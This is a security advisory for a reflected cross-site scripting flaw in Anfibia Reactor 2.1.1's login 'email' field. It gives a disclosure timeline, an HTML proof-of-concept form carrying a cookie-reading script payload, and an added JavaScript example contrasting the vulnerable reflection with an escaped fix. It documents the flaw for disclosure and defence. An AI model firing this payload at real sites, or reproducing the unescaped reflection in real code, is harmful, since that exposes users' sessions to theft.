Anfibia Reactor 2.1.1 Cross Site Scripting

Risk: Low
Local: No
Remote: Yes

Anfibia Reactor 2.1.1 Remote XSS POST Injection Vulnerability

Vendor: Anfibia Software
Product web page:
Affected version:

Summary: Fast web-based server monitoring. Keep an eye on servers, connections, databases, CPU, hard drives and more!

Desc: The Anfibia Reactor JS service suffers from an XSS vulnerability when parsing user input supplied to the 'email' parameter via the POST method in the 'reactor/' script at the manager login interface. The submitted value is returned in the response without proper output encoding, so an attacker who gets a user to submit a crafted form can execute arbitrary HTML and script code in that user's browser session (the proof of concept below reads document.cookie).

Tested on: Microsoft Windows XP Professional SP3 (EN)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab -

[14.03.2011] Vulnerability discovered.
[16.03.2011] Contact with the vendor.
[16.03.2011] Vendor replies asking for more details.
[16.03.2011] Sent vulnerability details to vendor.
[16.03.2011] Vendor confirms XSS issue.
[06.04.2011] Vendor releases version 3 to address this issue.
[06.04.2011] Coordinated public advisory released.

Advisory ID: ZSL-2011-5008
Advisory URL:
Vendor Advisory:
Vendor Patch:

14.03.2011

Proof of concept (HTML page; the hidden form posts the same field names the login interface expects, with the payload in 'email'):

<html>
<head>
<title>Anfibia Reactor 2.1.1 Remote XSS POST Injection Vulnerability</title>
<!-- Submits the hidden form below when the "Exploit!" link is clicked. -->
<script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script>
</head>
<body bgcolor="#1C1C1C">
<!-- The form must be pointed at the target's 'reactor/' login script (action is left empty here). -->
<form action="" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="token" id="token" value="" />
<input type="hidden" name="passwdhash" id="passwdhash" />
<!-- The leading "> closes the attribute the value is reflected into, then the script runs. -->
<input type="hidden" name="email" id="email" value='"><script>alert(document.cookie)</script>' />
<input type="hidden" name="password" id="password" />
</form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit!</h3></center></font></b></a>
</body>
</html>
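The following is an added example and is not code from the advisory or from Anfibia. It models the flaw the advisory describes: a login handler that parses the POST body and reflects the 'email' value into the re-rendered form's value="..." attribute without output encoding, placed next to a hardened handler that HTML-escapes the value for that context. The function names, the template markup and the constructed request body are assumptions; only the payload is taken from the proof of concept above.

```javascript
// Added example, not Anfibia's code. Models the reflected 'email' parameter
// described in the advisory and shows the output-encoding fix.
// Function names, template markup and the request body are assumptions.

// Payload from the advisory's proof of concept.
const POC_PAYLOAD = '"><script>alert(document.cookie)</script>';

// Constructed request body, shaped like what the PoC form posts
// (application/x-www-form-urlencoded, same four field names).
const SAMPLE_BODY = new URLSearchParams({
  token: '',
  passwdhash: '',
  email: POC_PAYLOAD,
  password: '',
}).toString();

// Parse an application/x-www-form-urlencoded body into a plain object.
function parseFormBody(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Escape the five characters that matter in HTML text and in
// double- or single-quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the submitted email is concatenated straight into the
// value="..." attribute, so a leading "> closes the attribute and the tag
// and the rest of the input is parsed as markup.
function renderLoginVulnerable(fields) {
  const email = fields.email ?? '';
  return `<form method="POST"><input type="text" name="email" value="${email}" /></form>`;
}

// Hardened: identical template, but the value is escaped for the
// attribute context before it is written out.
function renderLoginHardened(fields) {
  const email = escapeHtml(fields.email ?? '');
  return `<form method="POST"><input type="text" name="email" value="${email}" /></form>`;
}

// The templates above contain no <script> tag of their own, so any
// <script start tag in the rendered page came from user input.
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Handle one POST: parse the body, then render with the given template.
function handleLoginPost(body, render) {
  return render(parseFormBody(body));
}

// Stand-alone demonstration.
console.log('vulnerable reflects script tag:',
  containsInjectedScript(handleLoginPost(SAMPLE_BODY, renderLoginVulnerable)));
console.log('hardened reflects script tag:  ',
  containsInjectedScript(handleLoginPost(SAMPLE_BODY, renderLoginHardened)));
```

The escaping is context-specific: encoding `"` is what keeps the payload inside the attribute, and encoding `<` and `>` is what stops it from becoming a tag if the same value is ever reflected into element text instead. Escaping at output time, per context, is the fix that version 3 would need to apply wherever the login page echoes request parameters.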

